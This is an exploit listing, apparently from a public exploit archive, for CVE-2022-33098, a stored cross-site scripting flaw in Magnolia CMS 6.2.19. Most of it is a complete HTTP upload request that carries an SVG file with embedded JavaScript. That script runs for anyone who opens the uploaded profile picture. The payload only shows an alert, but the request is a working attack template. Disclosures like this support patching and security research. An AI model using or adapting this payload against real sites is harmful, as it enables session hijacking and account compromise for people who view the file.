Exploit for Magnolia CMS 6.2.19 Cross Site Scripting CVE-2022-33098

Name: Exploit for Magnolia CMS 6.2.19 Cross Site Scripting CVE-2022-33098
Rating: 5 (235 reviews)
2022-07-06 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:167705
# Exploit Title: Magnolia CMS <= 6.2.19 - Stored Cross-Site Scripting (XSS)  
# Date: 08/05/2022  
# Exploit Author: Giulio Garzia 'Ozozuz'  
# Vendor Homepage: https://www.magnolia-cms.com/  
# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip  
# Version: 6.2.19  
# Tested on: Linux, Windows, Docker  
# CVE : CVE-2022-33098  
  
Explanation  
Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.  
  
===== REQUEST =====  
POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908  
Content-Length: 620  
Connection: close  
Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: iframe  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
  
-----------------------------399178799522967017241464837908  
Content-Disposition: form-data; name="140_file"; filename="xss.svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
<script type="text/javascript">  
alert('POC - Magnolia CMS');  
</script>  
</svg>  
  
-----------------------------399178799522967017241464837908--